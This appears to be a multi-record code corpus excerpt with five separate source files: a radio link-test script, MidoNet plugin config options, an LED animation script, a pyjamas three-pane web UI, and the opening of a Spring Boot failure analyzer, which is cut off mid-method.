    g_send_delay_default = send_delay
    receive_start(target_node, g_packets_per_test)
    request_send_me()
def rx_test(target_node, test_att, test_tx_pwr, packets_per_test, send_period, send_delay):
    """Store the test parameters and ask the target node to count the
    packets we are about to send (the mirror image of tx_test)."""
    global g_target_node, g_test_att, g_test_tx_pwr
    global g_receive_count, g_lq_sum, g_packets_per_test
    global g_send_period, g_send_delay_default
    global g_receive_me_time, g_receive_target_count
    # print 'rxtest att:', test_att, ' pwr', test_tx_pwr
    g_receive_target_count = 0
    g_target_node = target_node
    g_test_att = test_att
    g_test_tx_pwr = test_tx_pwr
    g_lq_sum = itos(0)
    g_packets_per_test = packets_per_test
    g_send_period = send_period
    g_send_delay_default = send_delay
    request_receive_me()
def receive_started(packets_to_send):
    """RPC ack from the receiver: it is counting now, so cancel the pending
    receive_me retry and start the pre-send countdown for our packets."""
    global g_send_delay
    global g_send_packets_remaining
    global g_test_att
    global g_test_tx_pwr
    global g_receive_me_time
    if g_target_node == rpcSourceAddr():
        # print 'receive_started'
        g_receive_me_time = None
        set_att(g_test_att)
        txPwr(g_test_tx_pwr)
        g_send_delay = g_send_delay_default
        g_send_packets_remaining = packets_to_send
def tx_multi_test(target_node, tx_pwr):
    """Start a binary search over attenuation (0..63) to find the highest
    attenuation at which the link still works, beginning at the midpoint.

    Bug fix: tx_test() takes 6 parameters but was called with only 3,
    which raises a TypeError; forward the current module-level packet
    count / period / delay settings for the missing arguments.
    """
    global g_multi_att_min
    global g_multi_att_max
    set_att(0)
    g_multi_att_min = 0
    g_multi_att_max = 63
    tx_test(target_node, (g_multi_att_min + g_multi_att_max) / 2, tx_pwr,
            g_packets_per_test, g_send_period, g_send_delay_default)
def receive_results(receive_count, lq_sum):
    """RPC reply carrying the target node's receive statistics; store
    them and cancel the pending results-request retry."""
    global g_receive_count, g_lq_sum
    global g_send_receive_results_time, g_target_node
    if g_target_node == rpcSourceAddr():
        g_send_receive_results_time = None
        g_receive_count = receive_count
        g_lq_sum = lq_sum
        # print 'cnt:', receive_count, ' lq:', lq_sum
def send_receive_results(target_node):
    """RPC entry point: if addressed to us, broadcast our receive stats."""
    # Globals are only read here, so no `global` declaration is required.
    if target_node == localAddr():
        mcastRpc(1, 1, 'receive_results', g_receive_count, g_lq_sum)
def get_receive_count():
    """Return the number of test packets received so far."""
    # Reading a module global needs no `global` declaration.
    return g_receive_count
def get_lq_sum():
    """Return the accumulated link quality scaled by 100 and divided by the
    receive count, using the 32-bit string-math helpers.

    NOTE(review): divides by g_receive_count -- behaviour when the count is
    0 (or one of the negative request sentinels) depends on div_32; confirm.
    """
    global g_lq_sum
    global g_receive_count
    return stoi(
        div_32(
            mult_32(
                g_lq_sum,
                itos(100)
            ),
            itos(g_receive_count)
        )
    )
|
unknown
|
codeparrot/codeparrot-clean
| ||
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2012 Midokura Japan K.K.
# Copyright (C) 2013 Midokura PTE LTD
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Tomoe Sugihara, Midokura Japan KK
from oslo.config import cfg
# Configuration options for the MidoNet Neutron plugin, registered under
# the [MIDONET] section of the service configuration file.
# NOTE(review): `_` is presumably the gettext alias that oslo/neutron
# installs into builtins -- it is not imported in this file; confirm.
midonet_opts = [
    cfg.StrOpt('midonet_uri', default='http://localhost:8080/midonet-api',
               help=_('MidoNet API server URI.')),
    cfg.StrOpt('username', default='admin',
               help=_('MidoNet admin username.')),
    cfg.StrOpt('password', default='passw0rd',
               secret=True,
               help=_('MidoNet admin password.')),
    cfg.StrOpt('project_id',
               default='77777777-7777-7777-7777-777777777777',
               help=_('ID of the project that MidoNet admin user'
                      'belongs to.')),
    cfg.StrOpt('provider_router_id',
               default=None,
               help=_('Virtual provider router ID.')),
    cfg.StrOpt('metadata_router_id',
               default=None,
               help=_('Virtual metadata router ID.')),
    cfg.StrOpt('mode',
               default='dev',
               help=_('Operational mode. Internal dev use only.'))
]
cfg.CONF.register_opts(midonet_opts, "MIDONET")
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python3
"""Stars lights up random LEDs
Try running with optional config name.
ex. ./stars.py blackberry
"""
__author__ = 'plong0 <plong00@gmail.com>'
import sys
import time
import random
from pprint import pprint
from LED_Tunnel import Tunnel
# fun settings - try adding your own config and playing with the options
# Per-config animation parameters:
#   launchDelay  - minimum seconds between launch attempts
#   launchCount  - stars launched per launch event
#   maximum      - max simultaneous stars
#   fadeIn/lifespan/fadeOut - [min, max] seconds, randomised per star
#   colours      - RGB tuples a star may take
configs = {
    'basic': {
        'launchDelay': 0.1,
        'launchCount': 1,
        'maximum': int(Tunnel.LED_COUNT*2.0/3.0),
        'fadeIn': [0.2, 0.3],
        'lifespan': [1.0, 5.0],
        'fadeOut': [0.25, 0.5],
        'colours': [
            (255, 255, 0), # yellow
            (255, 192, 0), # orange
            (255, 255, 255) # white
        ]
    },
    'blackberry': {
        'launchDelay': 0.0,
        'launchCount': 1,
        'maximum': int(Tunnel.LED_COUNT*0.75),
        'fadeIn': [0.2, 0.3],
        'lifespan': [1.0, 5.0],
        'fadeOut': [0.25, 0.5],
        'colours': [
            (192, 0, 255), # purple
            (255, 128, 255), # light purple
            (255, 192, 255) # white
        ]
    },
    'rainbow-sky': {
        'launchDelay': 0.0,
        'launchCount': 5,
        'maximum': int(Tunnel.LED_COUNT),
        'fadeIn': [0.5, 1.0],
        'lifespan': [5.0, 10.0],
        'fadeOut': [0.75, 1.5],
        'colours': [
            (128, 0, 0), # dark red
            (255, 0, 0), # red
            (255, 165, 0), # orange
            (255, 192, 0), # orange
            (255, 255, 0), # yellow
            (0, 128, 0), # green
            (0, 255, 0), # green
            (0, 0, 128), # blue
            (0, 0, 255), # blue
            (192, 0, 192), # purple
            (192, 0, 255), # purple
            (255, 255, 255), # white
        ]
    }
}  # (dropped the stray trailing ';' -- harmless but unidiomatic Python)
# Pick the first config by default, or the one named on the command line.
config_name = next(iter(configs))
if len(sys.argv) > 1:
    config_name = sys.argv[1]
    if (config_name not in configs):
        sys.exit('Invalid config name: "{}"'.format(config_name))
config = configs[config_name]
# system settings
inverse = True # if True, start at the back of the tunnel (NOTE(review): unused in this script)
frameDelay = 0.01 # delay between frames - controls animation speed (increase to slow down)
print('RUNNING CONFIG: "{}"'.format(config_name))
pprint(config)
# Animation state: LED index -> star dict, and the last launch timestamp.
activeStars = {}
lastLaunch = None
def should_launch():
    """True when we are below the star limit and the launch delay elapsed."""
    global activeStars, lastLaunch
    if len(activeStars) >= config['maximum']:
        return False
    return lastLaunch is None or (time.time() - lastLaunch) >= config['launchDelay']
def do_launch():
    """Try to spawn a star on a random LED; always record the attempt time.

    If the chosen LED is already occupied nothing is spawned (the attempt
    still counts against the launch delay).
    """
    global activeStars, lastLaunch
    random.seed()
    position = random.randint(0, Tunnel.LED_COUNT-1)
    if position not in activeStars:
        activeStars[position] = {
            'state': 0,  # 0 = fading in
            'stateStart': time.time(),
            'colourIndex': random.randint(0, len(config['colours'])-1),
            'fadeIn': random.uniform(*config['fadeIn']),
            'lifespan': random.uniform(*config['lifespan']),
            'fadeOut': random.uniform(*config['fadeOut']),
        }
    lastLaunch = time.time()
# Main animation loop: launch new stars, advance every active star through
# its fade-in (0) -> hold (1) -> fade-out (2) state machine, interpolate
# its colour, and push the frame to the LED client.
while True:
    if should_launch():
        for i in range(config['launchCount']):
            do_launch()
    pixels = [ (0,0,0) ] * Tunnel.LED_COUNT
    killStars = []
    for index in activeStars:
        activeStar = activeStars[index]
        stateTime = time.time() - activeStar['stateStart']
        # stateProg in [0,1]; colour1/colour2 are the interpolation endpoints.
        if activeStar['state'] == 0:
            if activeStar['fadeIn']:
                stateProg = stateTime / activeStar['fadeIn']
            else:
                stateProg = 1.0
            colour1 = (0,0,0)
            colour2 = config['colours'][activeStar['colourIndex']]
        elif activeStar['state'] == 1:
            if activeStar['lifespan']:
                stateProg = stateTime / activeStar['lifespan']
            else:
                stateProg = 1.0
            colour1 = config['colours'][activeStar['colourIndex']]
            colour2 = config['colours'][activeStar['colourIndex']]
        elif activeStar['state'] == 2:
            if activeStar['fadeOut']:
                stateProg = stateTime / activeStar['fadeOut']
            else:
                stateProg = 1.0
            colour1 = config['colours'][activeStar['colourIndex']]
            colour2 = (0,0,0)
            # Fade-out finished: mark the star for removal.
            if stateProg >= 1.0:
                killStars.append(index)
        if index not in killStars:
            # Phase finished (but not dying): advance to the next state and
            # clamp progress so this frame renders the end colour exactly.
            if stateProg >= 1.0:
                activeStar['state'] += 1
                activeStar['stateStart'] = time.time()
                stateProg = 1.0
            pixels[index] = ( colour1[0]+(colour2[0]-colour1[0])*stateProg, colour1[1]+(colour2[1]-colour1[1])*stateProg, colour1[2]+(colour2[2]-colour1[2])*stateProg )
    # kill the expired stars
    for index in killStars:
        activeStars.pop(index, None)
    Tunnel.Client.put_pixels(pixels)
    time.sleep(frameDelay)
|
unknown
|
codeparrot/codeparrot-clean
| ||
import pyjd
from pyjamas.ui.RootPanel import RootPanel
from pyjamas.ui.HTML import HTML
from pyjamas.ui.Label import Label
from pyjamas.ui.Button import Button
from pyjamas.ui.HorizontalPanel import HorizontalPanel
from pyjamas.ui.AbsolutePanel import AbsolutePanel
from pyjamas.ui.ScrollPanel import ScrollPanel
from pyjamas.ui.Grid import Grid
from pyjamas.ui.SimplePanel import SimplePanel
from pyjamas.ui.FlexTable import FlexTable
from pyjamas.ui.Image import Image
from pyjamas.ui.DockPanel import DockPanel
from pyjamas.ui import HasHorizontalAlignment
from pyjamas.ui import HasVerticalAlignment
from pyjamas.ui import HasAlignment
from pyjamas import Window
#from pyjamas.HorizSplitPanel import HorizontalSplitPanel
from pyjamas.JSONService import JSONProxy
from Trees import Trees
from pyjamas.Timer import Timer
class CollapserPanel(SimplePanel):
    """A DialogBox-styled panel with a caption bar and a collapse button.

    Clicking the button toggles between the full panel and a thin 15px
    strip; the owning `sink` is notified of width changes via
    setCollapserWidth() so it can re-layout siblings.
    """
    def __init__(self, sink):
        SimplePanel.__init__(self)
        self.sink = sink
        self.caption = HTML()
        self.child = None
        self.showing = False
        self.dragging = False
        self.dragStartX = 0
        self.dragStartY = 0
        self.panel = FlexTable()
        # Collapse toggle icon in the header's east slot.
        self.collapse = Image("./images/cancel.png")
        self.collapse.addClickListener(self)
        dock = DockPanel()
        dock.setSpacing(0)
        dock.add(self.collapse, DockPanel.EAST)
        dock.add(self.caption, DockPanel.WEST)
        dock.setCellHorizontalAlignment(self.collapse, HasAlignment.ALIGN_RIGHT)
        dock.setCellVerticalAlignment(self.collapse, HasAlignment.ALIGN_TOP)
        dock.setCellHorizontalAlignment(self.caption, HasAlignment.ALIGN_LEFT)
        dock.setCellWidth(self.caption, "100%")
        dock.setWidth("100%")
        dock.setHeight("100%")
        # Row 0 is the header dock; row 1 holds the (optional) child widget.
        self.panel.setWidget(0, 0, dock)
        self.panel.setHeight("100%")
        self.panel.setWidth("100%")
        self.panel.setBorderWidth(0)
        self.panel.setCellPadding(0)
        self.panel.setCellSpacing(0)
        self.panel.getCellFormatter().setHeight(1, 0, "100%")
        self.panel.getCellFormatter().setWidth(1, 0, "100%")
        self.panel.getCellFormatter().setAlignment(1, 0, HasHorizontalAlignment.ALIGN_LEFT, HasVerticalAlignment.ALIGN_TOP)
        SimplePanel.setWidget(self, self.panel)
        self.setStyleName("gwt-DialogBox")
        self.caption.setStyleName("Caption")
        self.collapse.setStyleName("Close")
        dock.setStyleName("Header")
        #self.caption.addMouseListener(self)
        self.collapsed = False
        self.collapsed_width = "15px"
        self.uncollapsed_width = "100%"
    def setInitialWidth(self, width):
        # Record the expanded width and apply it immediately.
        self.uncollapsed_width = width
        SimplePanel.setWidth(self, width)
        self.sink.setCollapserWidth(self, width)
    def setHeight(self, height):
        SimplePanel.setHeight(self, height)
    def onClick(self, sender):
        # Toggle collapsed state, hiding/showing caption and child.
        # NOTE(review): the collapsed icon path "./tree_closed.gif" lacks the
        # "./images/" prefix used for cancel.png -- confirm it is intentional.
        if self.collapsed == False:
            self.collapse.setUrl("./tree_closed.gif")
            self.collapsed = True
            self.caption.setVisible(False)
            if self.child:
                self.child.setVisible(False)
            self.setWidth(self.collapsed_width)
            self.sink.setCollapserWidth(self, self.collapsed_width)
        else:
            self.collapse.setUrl("./images/cancel.png")
            self.collapsed = False
            self.caption.setVisible(True)
            if self.child:
                self.child.setVisible(True)
            self.setWidth(self.uncollapsed_width)
            self.sink.setCollapserWidth(self, self.uncollapsed_width)
    def setHTML(self, html):
        self.caption.setHTML(html)
    def setText(self, text):
        self.caption.setText(text)
    def remove(self, widget):
        # Only the current child may be removed; mirrors SimplePanel.remove.
        if self.child != widget:
            return False
        self.panel.remove(widget)
        return True
    def doAttachChildren(self):
        SimplePanel.doAttachChildren(self)
        self.caption.onAttach()
    def doDetachChildren(self):
        SimplePanel.doDetachChildren(self)
        self.caption.onDetach()
    def setWidget(self, widget):
        # Replace the body widget (row 1) with `widget`.
        if self.child is not None:
            self.panel.remove(self.child)
        if widget is not None:
            self.panel.setWidget(1, 0, widget)
        self.child = widget
def space_split(data):
    """Split `data` at the first space into exactly two parts.

    Returns [before, after] where `after` keeps any further spaces.
    Bug fix: the original used str.find(), so input with no space yielded
    the nonsense pair [data[:-1], data] (find returns -1).  Now such input
    returns [data, ''] so callers indexing [0]/[1] stay safe.
    """
    head, _sep, tail = data.partition(" ")
    return [head, tail]
class RightGrid(DockPanel):
    """A titled FlexTable filled incrementally via a Timer.

    set_items() stores (command, col, row, data) tuples and onTimer()
    drains them 10 at a time so building huge grids does not block the
    browser UI thread.  Supported commands: 'data' (cell HTML),
    'cellstyle' (CSS attr), 'align' (vert/horiz), 'cellspan' (row/col span);
    '-' in a field means "leave unchanged".
    """
    def __init__(self, title):
        DockPanel.__init__(self)
        self.grid = FlexTable()
        title = HTML(title)
        self.add(title, DockPanel.NORTH)
        self.setCellHorizontalAlignment(title,
            HasHorizontalAlignment.ALIGN_LEFT)
        self.add(self.grid, DockPanel.CENTER)
        # NOTE(review): pyjamas appears to accept CSS-style strings here
        # even though the GWT API takes ints -- confirm before porting.
        self.grid.setBorderWidth("0px")
        self.grid.setCellSpacing("0px")
        self.grid.setCellPadding("4px")
        self.formatCell(0, 0)
        self.grid.setHTML(0, 0, " ")
    def clear_items(self):
        # Reset the incremental-fill state.
        self.index = 0
        self.items = {}
    def set_items(self, items):
        # Store pending items and kick off the incremental fill.
        self.items = items
        self.index = 0
        self.max_rows = 0
        self.max_cols = 0
        Timer(1, self)
    def onTimer(self, timer):
        # Drain up to 10 pending items, then reschedule if more remain.
        count = 0
        while count < 10 and self.index < len(self.items):
            self._add_items(self.index)
            self.index += 1
            count += 1
        if self.index < len(self.items):
            timer.schedule(1)
    def _add_items(self, i):
        # Apply one queued (command, col, row, data) tuple, growing and
        # formatting the grid as needed.
        item = self.items[i]
        command = item[0]
        col = item[1]
        row = item[2]
        data = item[3]
        format_row = -1
        format_col = -1
        if col+1 > self.max_cols:
            format_col = self.max_cols
            #self.grid.resizeColumns(col+1)
            self.max_cols = col+1
        if row+1 >= self.max_rows:
            format_row = self.max_rows
            #self.grid.resizeRows(row+1)
            self.max_rows = row+1
        if format_row >= 0:
            # Format the left-hand (row number) column of every new row.
            for k in range(format_row, self.max_rows):
                self.formatCell(k, 0)
        self.formatCell(row, col)
        cf = self.grid.getCellFormatter()
        if command == 'data':
            self.grid.setHTML(row, col, data)
        elif command == 'cellstyle':
            data = space_split(data)
            attr = data[0]
            val = data[1]
            cf.setStyleAttr(row, col, attr, val)
        elif command == 'align':
            data = space_split(data)
            vert = data[0]
            horiz = data[1]
            if vert != '-':
                cf.setVerticalAlignment(row, col, vert)
            if horiz != '-':
                cf.setHorizontalAlignment(row, col, horiz)
        elif command == 'cellspan':
            data = space_split(data)
            rowspan = data[0]
            colspan = data[1]
            if colspan != '-':
                cf.setColSpan(row, col, colspan)
            if rowspan != '-':
                cf.setRowSpan(row, col, rowspan)
    def formatCell(self, row, col):
        # Label the row-number column and apply the position-dependent style.
        self.grid.prepareCell(row, col)
        if col == 0 and row != 0:
            self.grid.setHTML(row, col, "%d" % row)
        if row != 0 and col != 0:
            # BUG FIX: the body of this `if` was entirely commented out,
            # leaving an empty block (a syntax error). Keep the guard as
            # documentation of intent and make it an explicit no-op.
            #self.grid.setHTML(row, col, " ")
            pass
        fmt = "rightpanel-cellformat"
        if col == 0 and row == 0:
            fmt = "rightpanel-cellcornerformat"
        elif row == 0:
            fmt = "rightpanel-celltitleformat"
        elif col == 0:
            fmt = "rightpanel-cellleftformat"
        self.grid.getCellFormatter().setStyleName(row, col, fmt)
class RightPanel(DockPanel):
    """A titled stack of content panels, one Grid row per dataset.

    Each row holds either a plain HTML widget (add_html) or an
    incrementally-filled RightGrid (add_items), keyed by integer index.
    """
    def __init__(self):
        DockPanel.__init__(self)
        self.grids = {}
        self.g = Grid()
        self.g.setCellSpacing("0px")
        self.g.setCellPadding("8px")
        self.title = HTML("&nbsp;")
        self.title.setStyleName("rightpanel-title")
        self.add(self.title, DockPanel.NORTH)
        self.setCellWidth(self.title, "100%")
        self.setCellHorizontalAlignment(self.title,
            HasHorizontalAlignment.ALIGN_LEFT)
        self.add(self.g, DockPanel.CENTER)
    def setTitle(self, title):
        self.title.setHTML(title)
    def clear_items(self):
        # Forward clear_items to grids that support it (plain HTML widgets
        # do not), then drop everything and shrink the layout grid.
        # NOTE(review): assumes self.grids is keyed 0..n-1 -- confirm.
        for i in range(len(self.grids)):
            g = self.grids[i]
            if hasattr(g, "clear_items"):
                g.clear_items()
        self.grids = {}
        self.g.resize(0, 0)
    def setup_panels(self, datasets):
        # Pre-size one layout row per dataset; rows are filled lazily by
        # add_html()/add_items().
        self.grids = {}
        self.data = {}
        self.names = {}
        self.loaded = {}
        size = len(datasets)
        self.g.resize(size, 1)
        #for i in range(size):
        #    item = datasets[i]
        #    fname = item[0]
        #    self.grids[i] = RightGrid(fname)
        #    self.g.setWidget(i, 0, self.grids[i])
    def add_html(self, html, name, index):
        # Fill row `index` with a static HTML widget.
        self.data[index] = html
        self.names[index] = name
        self.grids[index] = HTML(html)
        self.g.setWidget(index, 0, self.grids[index])
    def add_items(self, items, name, index):
        # Fill row `index` with an incrementally-built RightGrid.
        self.data[index] = items
        self.names[index] = name
        self.grids[index] = RightGrid("")
        self.grids[index].set_items(items)
        self.g.setWidget(index, 0, self.grids[index])
class MidPanel(Grid):
    """Single-column, selectable list of item names; clicking a row notifies
    the sink of the chosen item's location and name."""

    def __init__(self, sink):
        Grid.__init__(self)
        self.resize(1, 1)
        self.addTableListener(self)
        self.sink = sink
        self.selected_row = -1

    def set_items(self, items):
        # Drop any highlight left over from the previous item set.
        if self.selected_row != -1:
            self.styleRow(self.selected_row, False)
        self.item_names = []
        self.item_locations = []
        self.resizeRows(len(items))
        for row, entry in enumerate(items):
            label = entry[0]
            where = entry[1]
            self.setHTML(row, 0, label)
            self.item_names.append(label)
            self.item_locations.append(where)

    def onCellClicked(self, sender, row, col):
        # Move the highlight to the clicked row, then notify the sink.
        previous = self.selected_row
        self.styleRow(previous, False)
        self.selected_row = row
        self.styleRow(row, True)
        self.sink.select_right_grid(self.item_locations[row],
                                    self.item_names[row])

    def styleRow(self, row, selected):
        if row == -1:
            return
        formatter = self.getRowFormatter()
        if selected:
            formatter.addStyleName(row, "midpanel-SelectedRow")
        else:
            formatter.removeStyleName(row, "midpanel-SelectedRow")
class InfoDirectory:
    """Top-level application: a three-pane browser (tree, item list, detail
    panel) backed by a JSON-RPC info service."""

    def onModuleLoad(self):
        """Build the three collapsible panes and wire up resize/tree events."""
        self.remote = InfoServicePython()
        self.tree_width = 200
        self.tp = HorizontalPanel()
        self.tp.setWidth("%dpx" % (self.tree_width))
        self.treeview = Trees()
        self.treeview.fTree.addTreeListener(self)
        self.sp = ScrollPanel()
        self.tp.add(self.treeview)
        self.sp.add(self.tp)
        self.sp.setHeight("100%")
        self.horzpanel1 = HorizontalPanel()
        self.horzpanel1.setSize("100%", "100%")
        self.horzpanel1.setBorderWidth(1)
        self.horzpanel1.setSpacing("10px")
        self.rp = RightPanel()
        self.rps = ScrollPanel()
        self.rps.add(self.rp)
        self.rps.setWidth("100%")
        self.rp.setWidth("100%")
        self.cp1 = CollapserPanel(self)
        self.cp1.setWidget(self.sp)
        self.cp1.setHTML(" ")
        self.midpanel = MidPanel(self)
        self.cp2 = CollapserPanel(self)
        self.cp2.setWidget(self.midpanel)
        self.cp2.setHTML(" ")
        self.horzpanel1.add(self.cp1)
        self.horzpanel1.add(self.cp2)
        self.horzpanel1.add(self.rps)
        self.cp1.setInitialWidth("%dpx" % self.tree_width)
        self.cp2.setInitialWidth("200px")
        RootPanel().add(self.horzpanel1)
        # Size panes to the current viewport and track future resizes.
        width = Window.getClientWidth()
        height = Window.getClientHeight()
        self.onWindowResized(width, height)
        Window.addWindowResizeListener(self)

    def setCollapserWidth(self, widget, width):
        self.horzpanel1.setCellWidth(widget, width)

    def onWindowResized(self, width, height):
        # Keep the three panes sized to the browser viewport.
        self.cp1.setHeight("%dpx" % (height - 30))
        self.cp2.setHeight("%dpx" % (height - 30))
        self.rps.setHeight("%dpx" % (height - 30))
        self.horzpanel1.setHeight("%dpx" % (height - 20))

    def onTreeItemStateChanged(self, item):
        if item.isSelected():
            self.onTreeItemSelected(item)

    def onTreeItemSelected(self, item):
        obj = item.getUserObject()
        if len(obj.children) != 0:
            # Non-leaf node: nothing to fetch, just reset the panes.
            self.clear_mid_panel()
            return
        self.remote.get_midpanel_data(obj.root + "/" + obj.text, self)
        self.cp2.setHTML(obj.text)
        self.clear_right_panel()

    def clear_right_panel(self):
        self.horzpanel1.remove(2)
        self.horzpanel1.insert(HTML(""), 2)
        self.rp.setTitle(" ")

    def clear_mid_panel(self):
        self.clear_right_panel()

    def set_mid_panel(self, response):
        self.midpanel.set_items(response)
        self.cp2.setWidget(self.midpanel)

    def select_right_grid(self, location, name):
        # Swap the placeholder back for the real right panel, then fetch data.
        self.horzpanel1.remove(2)
        self.horzpanel1.insert(self.rps, 2)
        self.rp.setTitle(name)
        self.remote.get_rightpanel_datanames(location, self)

    def get_rightpanel_datasets(self, datasets):
        self.rp.clear_items()
        self.rp.setup_panels(datasets)
        for i in range(len(datasets)):
            item = datasets[i]
            fname = item[0]
            self.remote.get_rightpanel_data(fname, fname, i, self)

    def fill_right_grid(self, data):
        index = data.get('index')
        name = data.get('name')
        # 'in' replaces dict.has_key(), which was removed in Python 3;
        # the behaviour is identical.
        if 'items' in data:
            self.rp.add_items(data.get('items'), name, index)
        elif 'html' in data:
            self.rp.add_html(data.get('html'), name, index)

    def onRemoteResponse(self, response, request_info):
        # Dispatch on which RPC completed.
        method = request_info.method
        if method == "get_midpanel_data":
            self.set_mid_panel(response)
        elif method == "get_rightpanel_datanames":
            self.get_rightpanel_datasets(response)
        elif method == "get_rightpanel_data":
            self.fill_right_grid(response)

    def onRemoteError(self, code, message, request_info):
        # "%s" instead of "+": the original "ERROR " + code raises TypeError
        # when code is an int, masking the real failure being reported.
        RootPanel().add(HTML("Server Error or Invalid Response: ERROR %s" % code))
        RootPanel().add(HTML(message))
class InfoServicePython(JSONProxy):
    """JSON-RPC proxy exposing the three data-fetch methods implemented by
    the server-side services/EchoService.py."""
    def __init__(self):
        JSONProxy.__init__(self, "services/EchoService.py",
                           ["get_midpanel_data",
                            "get_rightpanel_datanames",
                            "get_rightpanel_data"])
if __name__ == '__main__':
    # Run under pyjd (pyjamas desktop) for local debugging; the browser
    # build compiles this module to JavaScript instead.
    pyjd.setup("http://127.0.0.1/examples/infohierarchy/public/InfoDirectory.html")
    app = InfoDirectory()
    app.onModuleLoad()
    pyjd.run()
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* Copyright 2012-present the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.boot.autoconfigure.diagnostics.analyzer;
import java.lang.annotation.Annotation;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.Set;
import org.jspecify.annotations.Nullable;
import org.springframework.beans.factory.BeanFactory;
import org.springframework.beans.factory.BeanFactoryUtils;
import org.springframework.beans.factory.InjectionPoint;
import org.springframework.beans.factory.NoSuchBeanDefinitionException;
import org.springframework.beans.factory.UnsatisfiedDependencyException;
import org.springframework.beans.factory.annotation.AnnotatedBeanDefinition;
import org.springframework.beans.factory.config.BeanDefinition;
import org.springframework.beans.factory.config.ConfigurableListableBeanFactory;
import org.springframework.boot.autoconfigure.condition.ConditionEvaluationReport;
import org.springframework.boot.autoconfigure.condition.ConditionEvaluationReport.ConditionAndOutcome;
import org.springframework.boot.autoconfigure.condition.ConditionEvaluationReport.ConditionAndOutcomes;
import org.springframework.boot.autoconfigure.condition.ConditionOutcome;
import org.springframework.boot.diagnostics.FailureAnalysis;
import org.springframework.boot.diagnostics.analyzer.AbstractInjectionFailureAnalyzer;
import org.springframework.context.annotation.Bean;
import org.springframework.core.ResolvableType;
import org.springframework.core.type.MethodMetadata;
import org.springframework.core.type.classreading.CachingMetadataReaderFactory;
import org.springframework.core.type.classreading.MetadataReader;
import org.springframework.core.type.classreading.MetadataReaderFactory;
import org.springframework.util.Assert;
import org.springframework.util.ClassUtils;
/**
* An {@link AbstractInjectionFailureAnalyzer} that performs analysis of failures caused
* by a {@link NoSuchBeanDefinitionException}.
*
* @author Stephane Nicoll
* @author Phillip Webb
* @author Scott Frederick
*/
class NoSuchBeanDefinitionFailureAnalyzer extends AbstractInjectionFailureAnalyzer<NoSuchBeanDefinitionException> {

	private final ConfigurableListableBeanFactory beanFactory;

	// Reads @Bean method metadata from class files without loading the classes.
	private final MetadataReaderFactory metadataReaderFactory;

	// Condition evaluation report captured at construction time.
	private final ConditionEvaluationReport report;

	NoSuchBeanDefinitionFailureAnalyzer(BeanFactory beanFactory) {
		Assert.isTrue(beanFactory instanceof ConfigurableListableBeanFactory,
				"'beanFactory' must be a ConfigurableListableBeanFactory");
		this.beanFactory = (ConfigurableListableBeanFactory) beanFactory;
		this.metadataReaderFactory = new CachingMetadataReaderFactory(this.beanFactory.getBeanClassLoader());
		// Get early as won't be accessible once context has failed to start
		this.report = ConditionEvaluationReport.get(this.beanFactory);
	}

	/**
	 * Build a {@link FailureAnalysis} describing why no bean matched, listing
	 * auto-configured and user-defined candidates that existed but could not be
	 * injected. Returns {@code null} when beans were found (ambiguity is a
	 * different failure mode, not analyzed here).
	 */
	@Override
	protected @Nullable FailureAnalysis analyze(Throwable rootFailure, NoSuchBeanDefinitionException cause,
			@Nullable String description) {
		if (cause.getNumberOfBeansFound() != 0) {
			return null;
		}
		List<AutoConfigurationResult> autoConfigurationResults = getAutoConfigurationResults(cause);
		List<UserConfigurationResult> userConfigurationResults = getUserConfigurationResults(cause);
		StringBuilder message = new StringBuilder();
		message.append(String.format("%s required %s that could not be found.%n",
				(description != null) ? description : "A component", getBeanDescription(cause)));
		InjectionPoint injectionPoint = findInjectionPoint(rootFailure);
		if (injectionPoint != null) {
			Annotation[] injectionAnnotations = injectionPoint.getAnnotations();
			if (injectionAnnotations.length > 0) {
				message.append(String.format("%nThe injection point has the following annotations:%n"));
				for (Annotation injectionAnnotation : injectionAnnotations) {
					message.append(String.format("\t- %s%n", injectionAnnotation));
				}
			}
		}
		if (!autoConfigurationResults.isEmpty() || !userConfigurationResults.isEmpty()) {
			message.append(String.format("%nThe following candidates were found but could not be injected:%n"));
			for (AutoConfigurationResult result : autoConfigurationResults) {
				message.append(String.format("\t- %s%n", result));
			}
			for (UserConfigurationResult result : userConfigurationResults) {
				message.append(String.format("\t- %s%n", result));
			}
		}
		String action = String.format("Consider %s %s in your configuration.",
				(!autoConfigurationResults.isEmpty() || !userConfigurationResults.isEmpty())
						? "revisiting the entries above or defining" : "defining",
				getBeanDescription(cause));
		return new FailureAnalysis(message.toString(), action, cause);
	}

	// Human-readable description of the missing bean, by type when known,
	// otherwise by name.
	private String getBeanDescription(NoSuchBeanDefinitionException cause) {
		if (cause.getResolvableType() != null) {
			Class<?> type = extractBeanType(cause.getResolvableType());
			return "a bean of type '" + type.getName() + "'";
		}
		return "a bean named '" + cause.getBeanName() + "'";
	}

	private Class<?> extractBeanType(ResolvableType resolvableType) {
		Class<?> rawClass = resolvableType.getRawClass();
		Assert.state(rawClass != null, "'rawClass' must not be null");
		return rawClass;
	}

	// Candidates that auto-configuration would have defined but did not,
	// either because a condition did not match or because the
	// auto-configuration class was explicitly excluded.
	private List<AutoConfigurationResult> getAutoConfigurationResults(NoSuchBeanDefinitionException cause) {
		List<AutoConfigurationResult> results = new ArrayList<>();
		collectReportedConditionOutcomes(cause, results);
		collectExcludedAutoConfiguration(cause, results);
		return results;
	}

	// User-defined beans of the requested type that exist but resolved to a
	// null bean instance.
	private List<UserConfigurationResult> getUserConfigurationResults(NoSuchBeanDefinitionException cause) {
		ResolvableType type = cause.getResolvableType();
		if (type == null) {
